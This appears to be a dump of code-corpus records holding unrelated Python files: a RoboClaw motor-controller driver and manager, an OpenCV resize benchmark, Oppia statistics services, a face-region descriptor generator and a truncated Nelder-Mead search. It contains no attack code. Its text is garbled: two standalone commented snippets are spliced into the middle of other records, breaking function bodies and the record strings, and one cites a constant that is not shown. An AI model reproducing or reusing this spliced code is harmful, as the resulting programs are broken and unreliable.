speed, distance, buffer):\n        self.sendcommand(128, 44)\n        self.writelong(accel)\n        self.writeslong(speed)\n        self.writelong(distance)\n        self.writebyte(buffer)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetM2SpeedAccelDistance(self, accel, speed, distance, buffer):\n        self.sendcommand(128, 45)\n        self.writelong(accel)\n        self.writeslong(speed)\n        self.writelong(distance)\n        self.writebyte(buffer)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetMixedSpeedAccelDistance(self, accel, speed1, distance1, speed2, distance2, buffer):\n        self.sendcommand(128, 46)\n        self.writelong(accel)\n        self.writeslong(speed1)\n        self.writelong(distance1)\n        self.writeslong(speed2)\n        self.writelong(distance2)\n        self.writebyte(buffer)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def readbuffercnts(self):\n        self.sendcommand(128, 47)\n        buffer1 = self.readbyte()\n        buffer2 = self.readbyte()\n        crc = self.checksum & 0x7F\n        if crc == self.readbyte():\n            return (buffer1, buffer2)\n        return (-1, -1)\n\n    def readcurrents(self):\n        self.sendcommand(128, 49)\n        motor1 = self.readword()\n        motor2 = self.readword()\n        crc = self.checksum & 0x7F\n        if crc == self.readbyte():\n            return (motor1, motor2)\n        return (-1, -1)\n\n    def SetMixedSpeedIAccel(self, accel1, speed1, accel2, speed2):\n        self.sendcommand(128, 50)\n        self.writelong(accel1)\n        self.writeslong(speed1)\n        self.writelong(accel2)\n        self.writeslong(speed2)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetMixedSpeedIAccelDistance(self, accel1, speed1, distance1, accel2, speed2, distance2, buffer):\n        self.sendcommand(128, 51)\n        self.writelong(accel1)\n        self.writeslong(speed1)\n        self.writelong(distance1)\n        self.writelong(accel2)\n        self.writeslong(speed2)\n        self.writelong(distance2)\n        self.writebyte(buffer)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetM1DutyAccel(self, accel, duty):\n        self.sendcommand(128, 52)\n        self.writesword(duty)\n        self.writeword(accel)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def 
SetM2DutyAccel(self, accel, duty):\n        self.sendcommand(128, 53)\n        self.writesword(duty)\n        self.writeword(accel)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetMixedDutyAccel(self, accel1, duty1, accel2, duty2):\n        self.sendcommand(128, 54)\n        self.writesword(duty1)\n        self.writeword(accel1)\n        self.writesword(duty2)\n        self.writeword(accel2)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def readM1pidq(self):\n        self.sendcommand(128, 55)\n        p = self.readlong()\n        i = self.readlong()\n        d = self.readlong()\n        qpps = self.readlong()\n        crc = self.checksum & 0x7F\n        if crc == self.readbyte():\n            return (p, i, d, qpps)\n        return (-1, -1, -1, -1)\n\n    def readM2pidq(self):\n        self.sendcommand(128, 56)\n        p = self.readlong()\n        i = self.readlong()\n        d = self.readlong()\n        qpps = self.readlong()\n        crc = self.checksum & 0x7F\n        if crc == self.readbyte():\n            return (p, i, d, qpps)\n        return (-1, -1, -1, -1)\n\n    def readmainbatterysettings(self):\n        self.sendcommand(128, 59)\n        min = self.readword()\n        max = self.readword()\n        crc = self.checksum & 0x7F\n        if crc == self.readbyte():\n            return (min, max)\n        return (-1, -1)\n\n    def readlogicbatterysettings(self):\n        self.sendcommand(128, 60)\n        min = self.readword()\n        max = self.readword()\n        crc = self.checksum & 0x7F\n        if crc == self.readbyte():\n            return (min, max)\n        return (-1, -1)\n\n    def SetM1PositionConstants(self, kp, ki, kd, kimax, deadzone, min, max):\n        self.sendcommand(128, 61)\n        self.writelong(kd)\n        self.writelong(kp)\n        self.writelong(ki)\n        self.writelong(kimax)\n        self.writelong(deadzone)  # deadzone follows kimax, matching readM1PositionConstants' field order\n        self.writelong(min)\n        self.writelong(max)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetM2PositionConstants(self, kp, ki, kd, kimax, deadzone, min, max):\n        self.sendcommand(128, 62)\n        self.writelong(kd)\n        self.writelong(kp)\n        self.writelong(ki)\n        self.writelong(kimax)\n        self.writelong(deadzone)  # deadzone follows kimax, matching readM2PositionConstants' field order\n        self.writelong(min)\n        self.writelong(max)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def readM1PositionConstants(self):\n        self.sendcommand(128, 63)\n        p = self.readlong()\n        i = self.readlong()\n        d = self.readlong()\n        imax = self.readlong()\n        deadzone = self.readlong()\n        min = self.readlong()\n        max = self.readlong()\n        crc = self.checksum & 0x7F\n        if crc == self.readbyte():\n            return (p, i, d, imax, deadzone, min, max)\n        return (-1, -1, -1, -1, -1, -1, -1)\n\n    def readM2PositionConstants(self):\n        self.sendcommand(128, 64)\n        p = self.readlong()\n        i = self.readlong()\n        d = self.readlong()\n        imax = self.readlong()\n        deadzone = self.readlong()\n        min = self.readlong()\n        max = self.readlong()\n        crc = self.checksum & 0x7F\n        if crc == self.readbyte():\n            return (p, i, d, imax, deadzone, min, max)\n        return (-1, -1, -1, -1, -1, -1, -1)\n\n    def SetM1SpeedAccelDeccelPosition(self, accel, speed, deccel, position, buffer):\n        self.sendcommand(128, 65)\n        self.writelong(accel)\n        self.writelong(speed)\n        self.writelong(deccel)\n        self.writelong(position)\n        self.writebyte(buffer)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetM2SpeedAccelDeccelPosition(self, accel, speed, deccel, position, buffer):\n        self.sendcommand(128, 66)\n        self.writelong(accel)\n        self.writelong(speed)\n        self.writelong(deccel)\n        self.writelong(position)\n        self.writebyte(buffer)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetMixedSpeedAccelDeccelPosition(self, accel1, speed1, deccel1, position1, accel2, speed2, deccel2, position2,\n                                         buffer):\n        self.sendcommand(128, 67)\n        self.writelong(accel1)\n        self.writelong(speed1)\n        self.writelong(deccel1)\n        self.writelong(position1)\n        self.writelong(accel2)\n        self.writelong(speed2)\n        self.writelong(deccel2)\n        self.writelong(position2)\n        self.writebyte(buffer)\n        self.writebyte(self.checksum & 0x7F)\n        
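# The speed commands above take encoder counts per second. A minimal sketch
# of mapping a wheel speed in revolutions per second onto SetM1Speed, using
# the TICKS_PER_REV constant defined at the top of this module:
TICKS_PER_REV = 253  # same empirically measured constant as above

def revs_to_ticks(rev_per_s):
    return int(rev_per_s * TICKS_PER_REV)

# e.g. one revolution per second forward on motor 1 (claw would be a RoboClaw
# instance; hypothetical usage, not executed here):
# claw.SetM1Speed(revs_to_ticks(1.0))   # -> 253 counts/s
assert revs_to_ticks(2.0) == 506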
return\n\n def readtemperature(self):\n self.sendcommand(128, 82)\n val = self.readword()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return val\n return -1\n\n def readerrorstate(self):\n self.sendcommand(128, 90)\n val = self.readbyte()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return val\n return -1\n\nclass RoboClawSim(object):\n \"\"\"\n Simulator class that fakes minimal RoboClaw functionality\n \"\"\"\n def __init__(self, port, baudrate, accel, max_ticks_per_second):\n self.M1Speed = 0\n self.M2Speed = 0\n\n self.M1EncoderCnts = 0\n self.M2EncoderCnts = 0\n\n def SetMixedSpeedAccel(self, accel, speed1, speed2):\n self.M1Speed = speed1\n self.M2Speed = speed2\n\n def readM1speed(self):\n return (self.M1Speed, 0)\n \n def readM2speed(self):\n return (self.M2Speed, 0)\n \n def readM1instspeed(self):\n return (int(self.M1Speed / 125.0), 0)\n\n def readM2instspeed(self):\n return (int(self.M2Speed / 125.0), 0)\n\n def SetM1pidq(self, p, i, d, qpps):\n pass\n\n def SetM2pidq(self, p, i, d, qpps):\n pass\n\n def readM1pidq(self):\n return (-1, -1, -1, -1)\n\n def readM2pidq(self):\n return (-1, -1, -1, -1)\n\n def readversion(self):\n return \"RoboClawSim version x.x\"\n\n def ResetEncoderCnts(self):\n self.M1EncoderCnts = 0\n self.M2EncoderCnts = 0\n\nclass RoboClawManager(threading.Thread):\n \"\"\"Manages one or more Roboclaw controllers, continuously polling them for\n instantaneous speed. Readings are pushed into an output queue. Meanwhile,\n RoboClawManager watches a command queue for incoming motor control\n commands (wheel angular velocities). When a wheel velocity command arrives,\n it is converted to four wheel speed commands in encoder ticks per second.\n \"\"\"\n def __init__(self, ports, baudrate, accel, max_ticks_per_second,\n ticks_per_rev, poll_rate_hz, cmd_input_queue, output_queue,\n simulate=False):\n \"\"\"\n Initialize the RoboClawManager.\n :param ports: a tuple of serial port init strings. ports[0] is the\n front two wheels, ports[1] is the rear.\n :param baudrate: for V4 (USB) Roboclaws, this value is ignored. For\n earlier models,this value should correspond to the switch settings\n on the board.\n :param max_ticks_per_second: ticks per second from the encoders when\n the motors are running at 100% duty cycle. This is empirically\n determined. 
Roboclaw needs this at start to report correct \"QPPS\".\n See the Roboclaw manual.\n :param poll_rate_hz: rate at which the work thread runs.\n RoboClawManager will periocially poll the RoboClaws for wheel\n speeds, and look for and dispatch incoming speed change commands.\n :param accel: the rate at which the Roboclaw controllers will\n accelerate the wheels to a commanded speed, in counts/s/s.\n :param cmd_input_queue: this queue will be checked every\n 1 / poll_interval_s seconds for incoming speed change commands.\n :param output_queue: every 1 / poll_rate_hz seconds, RoboClawManager\n polls the Roboclaw controllers for the current wheel speeds, pack\n the speeds into a tuple, and put them into the output_queue.\n \"\"\"\n self.ports = ports\n self.baudrate = baudrate\n self.accel = accel\n self.max_ticks_per_second = max_ticks_per_second\n self.ticks_per_rev = ticks_per_rev\n self.poll_rate_hz = poll_rate_hz\n self.cmd_queue = cmd_input_queue\n self.output_queue = output_queue\n self.simulate = simulate\n self.quit = False\n if simulate:\n self.front = rc.RoboClawSim(ports[0], baudrate, accel,\n max_ticks_per_second)\n self.rear = rc.RoboClawSim(ports[1], baudrate, accel,\n max_ticks_per_second)\n else:\n self.front = rc.RoboClaw(ports[0], baudrate, accel,\n max_ticks_per_second)\n self.rear = rc.RoboClaw(ports[1], baudrate, accel,\n max_ticks_per_second)\n self.front.SetMixedSpeedAccel(0, 0, 0)\n self.rear.SetMixedSpeedAccel(0, 0, 0)\n threading.Thread.__init__(self)\n\n def run(self):\n \"\"\"Ask the controller for our current speed and output it,\n unless we've got an incoming move command, in which\n we'll send the command and output our last speeds.\"\"\"\n w_prev = (0.0, 0.0, 0.0, 0.0)\n w_out = (0.0, 0.0, 0.0, 0.0)\n while((self.quit == False)):\n w_in = (0.0, 0.0, 0.0, 0.0)\n if 0 != len(self.cmd_queue):\n w_in = self.cmd_queue.popleft()\n self.set_wheel_velocities(w_in)\n w_out = w_prev\n else:\n w_out = self.get_wheel_velocities()\n self.output_queue.append(w_out)\n w_prev = w_out\n time.sleep(1.0 / self.poll_rate_hz)\n logging.info(\"RoboClawManager: exiting.\")\n\n def set_wheel_velocities(self, w):\n \"\"\"Set wheel velocities received in this order: lf, lr, rr, rf.\"\"\"\n n0 = self.radians_to_ticks(w[0])\n n1 = self.radians_to_ticks(w[1])\n n2 = self.radians_to_ticks(w[2])\n n3 = self.radians_to_ticks(w[3])\n\n self.front.SetMixedSpeedAccel(self.accel, int(n0), int(n3))\n self.rear.SetMixedSpeedAccel(self.accel, int(n1), int(n2))\n\n def get_wheel_velocities(self):\n \"\"\" Ask the Roboclaw controller for the current instantaneous speeds,\n in ticks/second. 
The speeds returned from the Roboclaws are in\n encoder ticks.\n \"\"\"\n w = [0.0, 0.0, 0.0, 0.0]\n w[0] = self.ticks_to_radians(self.front.readM1speed()[0])\n w[1] = self.ticks_to_radians(self.rear.readM1speed()[0])\n time.sleep(1.0/ self.poll_rate_hz)\n w[2] = self.ticks_to_radians(self.rear.readM2speed()[0])\n w[3] = self.ticks_to_radians(self.front.readM2speed()[0]) \n return tuple(w)\n\n def ticks_to_radians(self, n):\n theta = n * (2.0 * numpy.pi) / TICKS_PER_REV\n return theta\n\n def radians_to_ticks(self, theta):\n n = theta * TICKS_PER_REV / (2.0 * numpy.pi)\n return n\n\n","sub_path":"src/ros/src/waist_control/nodes/roboclaw_waist.py","file_name":"roboclaw_waist.py","file_ext":"py","file_size_in_byte":24545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"271788411","text":"import utils\nimport params\nimport cv2 as cv\nimport pdb\nimport numpy as np\n\ndef resize(downscaled_image, original_image, interpolation_method): \n \n standard_resize = utils.resize_height_width_3d_image_standard(downscaled_image, int(downscaled_image.shape[1]), int(downscaled_image.shape[2]*scale), interpolation_method=interpolation_method)\n \n if use_original: \n # standard_resize = np.transpose(standard_resize, [2, 0, 1, 3]) \n standard_resize = np.transpose(standard_resize, [2, 1, 0, 3]) \n \n ssim_standard, psnr_standard = utils.compute_ssim_psnr_batch(standard_resize, original_image)\n\n return ssim_standard, psnr_standard \n \ndef read_images(test_path):\n\n if use_original:\n add_to_path = 'original'\n else:\n add_to_path = 'transposed'\n \n test_images_gt = utils.read_all_directory_images_from_directory_test(test_path, add_to_path=add_to_path)\n test_images = utils.read_all_directory_images_from_directory_test(test_path, add_to_path='input_2_1_x%d' % scale)\n \n return test_images_gt, test_images\n \ndef compute_performance_indeces(test_images_gt, test_images, interpolation_method): \n num_images = 0 \n ssim_cnn_sum = 0; psnr_cnn_sum = 0; ssim_standard_sum = 0; psnr_standard_sum = 0; \n \n for index in range(len(test_images)): \n ssim_standard, psnr_standard = resize(test_images[index], test_images_gt[index], interpolation_method) \n ssim_standard_sum += ssim_standard; psnr_standard_sum += psnr_standard \n num_images += test_images_gt[index].shape[0]\n \n \n return psnr_standard_sum/num_images, ssim_standard_sum/num_images \n \ninterpolation_methods= {'INTER_LINEAR': cv.INTER_LINEAR,\n 'INTER_CUBIC': cv.INTER_CUBIC,\n 'INTER_LANCZOS4': cv.INTER_LANCZOS4,\n 'INTER_NEAREST': cv.INTER_NEAREST}\n \ntest_path = './data/test' \nscale = 4\nuse_original = True\ntest_images_gt, test_images = read_images(test_path)\n\nfor interpolation_method in interpolation_methods.keys():\n psnr, ssim = compute_performance_indeces(test_images_gt, test_images, interpolation_methods[interpolation_method])\n print('interpolation method %s has ssim %f psnr %f' % (interpolation_method, ssim, psnr))\n \n# tranposed images x2\n# interpolation method INTER_LINEAR has ssim 0.864469 psnr 36.881867\n# interpolation method INTER_NEAREST has ssim 0.875036 psnr 37.078668\n# interpolation method INTER_CUBIC has ssim 0.885053 psnr 37.163100\n# interpolation method INTER_LANCZOS4 has ssim 0.888183 psnr 37.231696\n\n# original images x2\n# interpolation method INTER_NEAREST has ssim 0.903308 psnr 34.100390\n# interpolation method INTER_LINEAR has ssim 0.897913 psnr 33.909730\n# interpolation method INTER_LANCZOS4 has ssim 0.912667 psnr 34.280864\n# interpolation method INTER_CUBIC 
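# The benchmark above only varies cv.resize's interpolation flag. A minimal
# standalone sketch of that comparison on a single array (assumes OpenCV is
# installed; the random image and names here are illustrative):
import cv2 as cv
import numpy as np

img = np.random.randint(0, 255, (64, 64), dtype=np.uint8)
for name, flag in [("nearest", cv.INTER_NEAREST), ("linear", cv.INTER_LINEAR),
                   ("cubic", cv.INTER_CUBIC), ("lanczos", cv.INTER_LANCZOS4)]:
    up = cv.resize(img, (256, 256), interpolation=flag)
    print(name, up.shape)  # (256, 256) for every method; only quality differs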
has ssim 0.910502 psnr 34.196829\n \n# x4 \n# interpolation method INTER_LINEAR has ssim 0.812111 psnr 26.742810 \n# interpolation method INTER_CUBIC has ssim 0.824901 psnr 27.201903 \n# interpolation method INTER_NEAREST has ssim 0.810961 psnr 26.230704 \n# interpolation method INTER_LANCZOS4 has ssim 0.826650 psnr 27.285459\n ","sub_path":"cnn/D-resize/standard_resize_D.py","file_name":"standard_resize_D.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"466215984","text":"# coding: utf-8\n#\n# Copyright 2013 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Services for Oppia statistics.\"\"\"\n\n__author__ = 'Sean Lip'\n\nimport collections\nimport utils\n\nfrom oppia.apps.exploration.domain import Exploration\nimport oppia.apps.exploration.services as exp_services\nfrom oppia.apps.statistics.models import Counter\nfrom oppia.apps.statistics.models import Journal\n\n\nIMPROVE_TYPE_DEFAULT = 'default'\nIMPROVE_TYPE_INCOMPLETE = 'incomplete'\n\nSTATS_ENUMS = utils.create_enum(\n 'exploration_visited', 'rule_hit', 'exploration_completed',\n 'feedback_submitted', 'state_hit')\n\n\ndef create_rule_name(rule):\n name = rule.name\n for key in rule.inputs:\n left_paren = name.index('(')\n name = name[0:left_paren] + name[left_paren:].replace(\n key, utils.to_ascii(rule.inputs[key]))\n return name\n\n\ndef get_event_id(event_name, eid):\n if event_name == STATS_ENUMS.exploration_visited:\n return 'e.%s' % eid\n if event_name == STATS_ENUMS.rule_hit:\n return 'default.%s' % eid\n if event_name == STATS_ENUMS.exploration_completed:\n return 'c.%s' % eid\n if event_name == STATS_ENUMS.feedback_submitted:\n return 'f.%s' % eid\n if event_name == STATS_ENUMS.state_hit:\n return 's.%s' % eid\n\n\nclass EventHandler(object):\n \"\"\"Records events.\"\"\"\n\n @classmethod\n def _record_event(cls, event_name, eid, extra_info=''):\n \"\"\"Updates statistics based on recorded events.\"\"\"\n\n event_id = get_event_id(event_name, eid)\n\n if event_name == STATS_ENUMS.exploration_visited:\n cls._inc(event_id)\n if event_name == STATS_ENUMS.rule_hit:\n cls._add(event_id, unicode(extra_info))\n if event_name == STATS_ENUMS.exploration_completed:\n cls._inc(event_id)\n if event_name == STATS_ENUMS.feedback_submitted:\n cls._add(event_id, unicode(extra_info))\n if event_name == STATS_ENUMS.state_hit:\n cls._inc(event_id)\n\n @classmethod\n def record_rule_hit(cls, exploration_id, state_id, rule, extra_info=''):\n \"\"\"Records an event when an answer triggers the default rule.\"\"\"\n cls._record_event(\n STATS_ENUMS.rule_hit, '%s.%s.%s' % (\n exploration_id, state_id, create_rule_name(rule)),\n extra_info)\n\n @classmethod\n def record_exploration_visited(cls, exploration_id):\n \"\"\"Records an event when an exploration is first loaded.\"\"\"\n cls._record_event(STATS_ENUMS.exploration_visited, exploration_id)\n\n @classmethod\n def record_exploration_completed(cls, 
exploration_id):\n \"\"\"Records an event when an exploration is completed.\"\"\"\n cls._record_event(STATS_ENUMS.exploration_completed, exploration_id)\n\n @classmethod\n def record_feedback_submitted(cls, url, feedback):\n \"\"\"Records an event where feedback was submitted via the web UI.\"\"\"\n cls._record_event(\n STATS_ENUMS.feedback_submitted, url, extra_info=feedback\n )\n\n @classmethod\n def record_state_hit(cls, exploration_id, state_id):\n \"\"\"Record an event when a state is loaded.\"\"\"\n cls._record_event(STATS_ENUMS.state_hit, '%s.%s' %\n (exploration_id, state_id))\n\n @classmethod\n def _inc(cls, event_id):\n \"\"\"Increments the counter corresponding to an event id.\"\"\"\n counter = Counter.get(event_id, strict=False)\n if not counter:\n counter = Counter(id=event_id)\n counter.value += 1\n counter.put()\n\n @classmethod\n def _add(cls, event_id, value):\n \"\"\"Adds to the list corresponding to an event id.\"\"\"\n journal = Journal.get(event_id, strict=False)\n if not journal:\n journal = Journal(id=event_id)\n journal.values.append(value)\n journal.put()\n\n\ndef get_exploration_stats(event_name, exploration_id):\n \"\"\"Retrieves statistics for the given event name and exploration id.\"\"\"\n\n if event_name == STATS_ENUMS.exploration_visited:\n event_id = get_event_id(event_name, exploration_id)\n return Counter.get_value_by_id(event_id)\n\n if event_name == STATS_ENUMS.exploration_completed:\n event_id = get_event_id(event_name, exploration_id)\n return Counter.get_value_by_id(event_id)\n\n if event_name == STATS_ENUMS.rule_hit:\n result = {}\n\n exploration = Exploration.get(exploration_id)\n for state_id in exploration.state_ids:\n state = exploration.get_state_by_id(state_id)\n result[state.id] = {\n 'name': state.name,\n 'rules': {}\n }\n for handler in state.widget.handlers:\n for rule in handler.rules:\n rule_name = create_rule_name(rule)\n event_id = get_event_id(\n event_name, '.'.join(\n [exploration_id, state.id, rule_name]))\n\n journal = Journal.get(event_id, strict=False)\n result[state.id]['rules'][rule_name] = {\n 'answers': collections.Counter(\n journal.values).most_common(10) if journal else [],\n }\n\n return result\n\n if event_name == STATS_ENUMS.state_hit:\n result = {}\n\n exploration = Exploration.get(exploration_id)\n for state_id in exploration.state_ids:\n state = exploration.get_state_by_id(state_id)\n event_id = get_event_id(\n event_name, '.'.join([exploration_id, state.id]))\n\n result[state.id] = {\n 'name': state.name,\n 'count': Counter.get_value_by_id(event_id),\n }\n return result\n\n\ndef get_top_ten_improvable_states(explorations):\n ranked_states = []\n for exploration in explorations:\n for state_id in exploration.state_ids:\n state = exploration.get_state_by_id(state_id)\n state_key = '%s.%s' % (exploration.id, state.id)\n\n # Get count of how many times the state was hit\n event_id = get_event_id(STATS_ENUMS.state_hit, state_key)\n all_count = Counter.get_value_by_id(event_id)\n if all_count == 0:\n continue\n\n # Count the number of times the default rule was hit.\n event_id = get_event_id(\n STATS_ENUMS.rule_hit, '%s.Default' % state_key)\n default_count = Journal.get_value_count_by_id(event_id)\n journal = Journal.get(event_id, strict=False)\n top_default_answers = collections.Counter(\n journal.values).most_common(5) if journal else []\n\n # Count the number of times an answer was submitted, regardless\n # of which rule it hits.\n completed_count = 0\n for handler in state.widget.handlers:\n for rule in 
handler.rules:\n rule_name = create_rule_name(rule)\n event_id = get_event_id(\n STATS_ENUMS.rule_hit, '%s.%s' %\n (state_key, rule_name))\n completed_count += Journal.get_value_count_by_id(\n event_id)\n\n incomplete_count = all_count - completed_count\n\n state_rank, improve_type = 0, ''\n\n eligible_flags = []\n default_rule = filter(lambda rule: rule.name == 'Default',\n state.widget.handlers[0].rules)[0]\n default_self_loop = default_rule.dest == state.id\n if float(default_count) / all_count > .2 and default_self_loop:\n eligible_flags.append({\n 'rank': default_count,\n 'improve_type': IMPROVE_TYPE_DEFAULT})\n if float(incomplete_count) / all_count > .2:\n eligible_flags.append({\n 'rank': incomplete_count,\n 'improve_type': IMPROVE_TYPE_INCOMPLETE})\n\n eligible_flags = sorted(\n eligible_flags, key=lambda flag: flag['rank'], reverse=True)\n if eligible_flags:\n state_rank = eligible_flags[0]['rank']\n improve_type = eligible_flags[0]['improve_type']\n\n ranked_states.append({\n 'exp_id': exploration.id,\n 'exp_name': exploration.title,\n 'state_id': state.id,\n 'state_name': state.name,\n 'rank': state_rank,\n 'type': improve_type,\n 'top_default_answers': top_default_answers\n })\n\n problem_states = sorted(\n [state for state in ranked_states if state['rank'] != 0],\n key=lambda state: state['rank'],\n reverse=True)\n return problem_states[:10]\n","sub_path":"oppia/apps/statistics/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":9333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"60237672","text":"class Employee:\n def __init__(self,name,age):\n self.n=name\n self.a=age\n def printv(self):\n print(\"name\",self.n)\n print('age',self.a)\nf=open(\"student\",'r')\nfor l in f:\n data=l.split(\",\")\n name=data[0]\n age=data[1]\n ob=Employee(name,age)\n ob.printv()","sub_path":"Advanced_python/work1.py","file_name":"work1.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"10890565","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 15 14:36:43 2014\n\n@author: joseph\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 12 12:35:04 2014\nThis file will used predefined 'coordinate' to select set of positions in a image\nthen pass them through parameters a and b to generate binary descriptor\n@author: joseph\n\"\"\"\nname = 'joseph'\nfrom numpy import *\nfrom skimage import io, color, filter\nimport skimage\nimport numpy as np\nimport pylab as pl\n\n\ndef BinDescriptor(image, coord, a, b):\n numRow = image.shape[0]\n numCol = image.shape[1]\n binaIm = zeros([numRow, numCol])\n X = zeros((coord.shape[0]))\n \n for i in range(coord.shape[0]):\n x = coord[i,0]\n y = coord[i,1]\n if (x - a < 0)|(x + a > numRow-1 )|(y - b < 0)|(y + b > numCol-1)|(x + a < 0)|(x - a > numRow-1 )|(y + b < 0)|(y - b > numCol-1): # in case b < \n continue;\n if (image[int(x-a), int(y-b)] - image[int(x+a), int(y+b)] > 0):\n binaIm[x,y] = 1\n X[i] = 1\n \n #pl.imshow(binaIm, cmap = 'gray')\n return X\n\n'''\nData Generating implemetation:\nNote: Quite similar to MakeData.m located in .../Research project/Data/New folder/\n'''\n\nnumImage = 1; # number of images will be chosen as training file\nnumSampleEachRegion = 200; \nn = numSampleEachRegion*5*numImage; # total number of samples in training set\nnumBinDescriptor = 992; # corresponds to 2^10 - 1 Node -> D = 11 \nSetofImageCanBeUsed = np.array([0,9,10,11, 12, 16, 
18, 23, 26,27, 30, 32, 35, 36, 38,\\\n 39, 40, 41, 43, 46, 48, 49, 50, 53, 57,64, 66, 67, \\\n 68, 69, 70, 71, 72, 73, 74, 75, 76, 78, 80, 81, 82,\\\n 84, 86, 87, 88, 90, 94, 95, 96, 97, 100, 101, 102],\\\n dtype = int) # 0: used to shift the index by 1\n\n\n# Initializing outputs\ndata = zeros((n, numBinDescriptor));\nlabels = zeros((n));\nA = zeros((numBinDescriptor, 1));\nB = zeros((numBinDescriptor, 1));\n\nt= 0;\n# Create vector A and B parameters\nfor u in np.array(range(32))+1: # u and v control the ranges of values of A and B \n for v in np.array(range(32))+1:\n if (u-17) == 0 & (v-17) == 0:\n continue;\n A[t] = u - 17; \n B[t] = v - 17; \n t = t + 1;\n # end of loop v\n# end of loop u\n\nfor i in np.array(range(numImage)):\n # Load image from file\n m = 90; # choose images that are different from those chosen in training phase\n pathData = '/host/Research Project/Data/Rdata' + str(m) + '.jpg';\n image = io.imread(pathData)\n image = color.rgb2gray(image)\n image2 = skimage.img_as_ubyte(image)\n\n coordinate = np.genfromtxt('/home/'+name+'/Dropbox/FaceRegion/coordinate'+ str(m) +'.csv', dtype = int, delimiter = ',')\n labels[(i*coordinate.shape[0]):((i+1)*coordinate.shape[0])] = coordinate[:,-1];\n X = zeros((coordinate.shape[0], numBinDescriptor)); # The training info from 1 image\n \n # change coordinate (x,y) - > (y,x)\n coord = zeros((coordinate.shape[0],coordinate.shape[1]))\n coord[:,0] = coordinate[:,1] \n coord[:,1] = coordinate[:,0]\n \n for j in np.array(range(numBinDescriptor)):\n # Define parapemeter a, b\n a = A[j];\n b = B[j];\n \n # Apply Gaussian low pass filter to reduce noise\n image = filter.gaussian_filter(image, sigma = 0.8)\n \n # Make binary descritor from the relative positions between chosen\n # points and others in image\n XTemp = BinDescriptor(image, coord, a, b);\n X[:,j] = XTemp;\n # end of loop j \n data[(i*X.shape[0]):((i+1)*(X.shape[0])), :] = X;\n# end of loop i\n \ntrainingSet = column_stack((data, labels))\ntrainingSet = np.array(trainingSet, dtype = uint8)\n\n# Write the 'trainingSet.mat' to .csv file\nnp.savetxt('TestSetFace'+ str(m) +'.csv', trainingSet , fmt='%.2f', delimiter=',')\n","sub_path":"FaceRegion/DataGenFace_test (Acer's conflicted copy 2014-03-27).py","file_name":"DataGenFace_test (Acer's conflicted copy 2014-03-27).py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"163934287","text":"from Vector import *\nfrom math import *\nfrom random import random\nfrom time import clock\n\nSMALLEST_TRIANGLE_SIZE = 0.001\nMAX_RUN_TIME = 0.1\nDOMAIN_LIMIT = 10\nHILL_CLIMBING_RADIUS = 0.01\nNUMBER_OF_GRID_POINTS = 100\nMAX_TRIANGLE_COUNT = 50\n\nTRIANGLE_COUNT = 0\nPROBE_COUNT1 = 0\nPROBE_COUNT2 = 0\nPROBE_COUNT3 = 0\n\nX = Vector(0,0)\n\ndef nextTriangle(A,B,C):\n [B,C,A] = Vector.sort([A,B,C])\n D = B + C - A\n E = 3*(B+C)/2 - 2*A\n F = (3*(B+C) - 2*A)/4\n G = (2*A + B + C)/4\n H = (A+B)/2\n I = (B+C)/2\n for x in range(0, 2):\n if(A.cost()>G.cost()):\n A.equals(G)\n if(A.cost()>F.cost()):\n A.equals(F)\n if(A.cost()>E.cost()):\n A.equals(E)\n if(A.cost()>D.cost()):\n A.equals(D)\n return A,B,C \n\ndef NelderMeadSearch():\n A= randomVector()\n B= randomVector()\n C= randomVector()\n count = 0\n while((count <= MAX_TRIANGLE_COUNT) and A.dist(C)>= SMALLEST_TRIANGLE_SIZE and B.dist(A) >= SMALLEST_TRIANGLE_SIZE <= C.dist(B)):\n count+=1\n global TRIANGLE_COUNT\n TRIANGLE_COUNT+=1\n A,B,C = nextTriangle(A,B,C)\n return B\n\ndef runNelderMeadSearch():\n 
